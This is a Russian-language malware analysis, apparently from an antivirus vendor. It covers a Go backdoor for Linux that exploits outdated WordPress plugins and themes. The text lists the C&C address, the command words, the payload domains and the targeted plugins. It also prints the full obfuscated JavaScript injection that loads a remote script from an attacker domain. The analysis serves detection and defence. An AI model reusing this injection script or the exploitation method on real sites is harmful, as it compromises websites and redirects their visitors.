- Упаковщик: отсутствует
- SHA1-хеш: 4ecd9ce89864da0bb758b8a9564976bbe6235aa0
Описание
Троянская программа, написанная на языке Go (Golang) и работающая в среде 32- и 64-битных операционных систем семейства Linux для x86-совместимых устройств. Представляет собой бэкдор, выполняющий команды злоумышленников. Основная функция этой программы — атака сайтов на базе CMS WordPress через эксплуатацию уязвимостей в устаревших версиях плагинов и тем оформления к этой платформе. В случае успеха в веб-страницы таких сайтов инжектируется вредоносный JavaScript, выполняющий переадресацию посетителей на другие ресурсы. Бэкдор является модификацией вредоносного приложения Linux.Backdoor.WordPressExploit.1 и отличается от него адресом управляющего сервера, адресом домена, с которого загружается вредоносный скрипт, а также дополненным списком эксплуатируемых уязвимостей.
Принцип действия
Linux.Backdoor.WordPressExploit.2 управляется через команды, которые принимает от расположенного по адресу 45[.]9.148[.]48 C&C-сервера. Доступные команды:
- {адрес_страницы} — атака заданной веб-страницы (сайта);
- wait — переход в режим ожидания;
- letmestop — завершение работы трояна;
- dieforme77 — остановка ведения журнала выполненных действий.
В зависимости от модификации трояна вредоносные JavaScript-файлы для инжектирования загружаются с одного из следующих доменов:
- count[.]trackstatisticsss[.]com
- lobbydesires[.]com
- letsmakeparty3[.]ga
- deliverygoodstrategies[.]com
- clon[.]collectfasttracks[.]com
Рассматриваемый вариант Linux.Backdoor.WordPressExploit.2 использует домен count[.]trackstatisticsss[.]com.
Перед атакой заданного сайта бэкдор в тестовом режиме пытается атаковать сайт site[.]com, отправляя ему HTTP-запрос вида:
hxxp[:]//site[.]com/?action=um_fileupload&domain=test&name=test
Если в ответе в начале строки отсутствует значение s-1-s-2-s-3, Linux.Backdoor.WordPressExploit.2 переходит к выполнению основной задачи. В противном случае он завершает свою работу.
Перед очередной атакой троян получает от C&C-сервера адрес целевого сайта, после чего пытается проэксплуатировать 28 известных уязвимостей в ряде плагинов и тем оформления WordPress. При этом для эксплуатации уязвимостей он запускает 250 отдельных процессов. Если какая-либо уязвимость не закрыта и атака прошла успешно, бэкдор информирует об этом C&C-сервер.
Плагины и темы оформления, к которым троян пытается применить уязвимости:
- WP Live Chat Support Plugin
- WordPress – Yuzo Related Posts
- Yellow Pencil Visual Theme Customizer Plugin
- Easysmtp
- WP GDPR Compliance Plugin
- Newspaper Theme on WordPress Access Control (уязвимость CVE-2016-10972);
- Thim Core
- Google Code Inserter
- Total Donations Plugin
- Post Custom Templates Lite
- WP Quick Booking Manager
- Faceboor Live Chat by Zotabox
- Blog Designer WordPress Plugin
- WordPress Ultimate FAQ (уязвимости CVE-2019-17232, CVE-2019-17233);
- WP-Matomo Integration (WP-Piwik)
- WordPress ND Shortcodes For Visual Composer
- WP Live Chat
- Coming Soon Page and Maintenance Mode
- Hybrid
- Brizy WordPress Plugin
- FV Flowplayer Video Player
- WooCommerce
- WordPress Coming Soon Page
- WordPress theme OneTone
- Simple Fields WordPress Plugin
- WordPress Delucks SEO plugin
- Poll, Survey, Form & Quiz Maker by OpinionStage
- Social Metrics Tracker
- WPeMatico RSS Feed Fetcher
- Rich Reviews plugin
Ниже представлены списки применяемых функций-эксплойтов:
Цель эксплуатации — выполнить инжект следующего вредоносного скрипта в уязвимый сайт:
var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61); // {hxxps[:]//count[.]trackstatisticsss[.]com/j.js?v=}
var d=document;
var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); // script
s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); // text/javascript
var pl = u;
s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
}
else {
d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s); // head
var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116)); // script
list.insertBefore(s, list.childNodes[0]);
}
В свою очередь, функция данного скрипта — внедрить полученный с сайта hxxps[:]//count[.]trackstatisticsss[.]com скрипт j.js в атакуемую страницу. Инжект происходит таким образом, что при ее загрузке скрипт получает наивысший приоритет над остальными элементами страницы и загружается самым первым. После заражения страницы при клике мышью в любом ее месте пользователи будут перенаправлены на нужный злоумышленникам сайт.
В процессе работы Linux.Backdoor.WordPressExploit.2 ведет непрерывную статистику выполняемых действий. Бэкдор отслеживает:
- общее число атакованных сайтов;
- все случаи успешного применения эксплойтов;
- число успешных эксплуатаций уязвимостей в плагине WordPress Ultimate FAQ и Facebook-мессенджере от компании Zotabox.
Кроме того, он информирует C&C-сервер обо всех выявленных незакрытых уязвимостях.
Артефакты
Linux.Backdoor.WordPressExploit.2 содержит нереализованную функциональность для взлома учетных записей администраторов атакуемых веб-сайтов через подбор логинов и паролей по имеющимся словарям (метод грубой силы или брутфорс). Данная функция могла присутствовать в более ранних модификациях трояна или запланирована для его будущих версий.
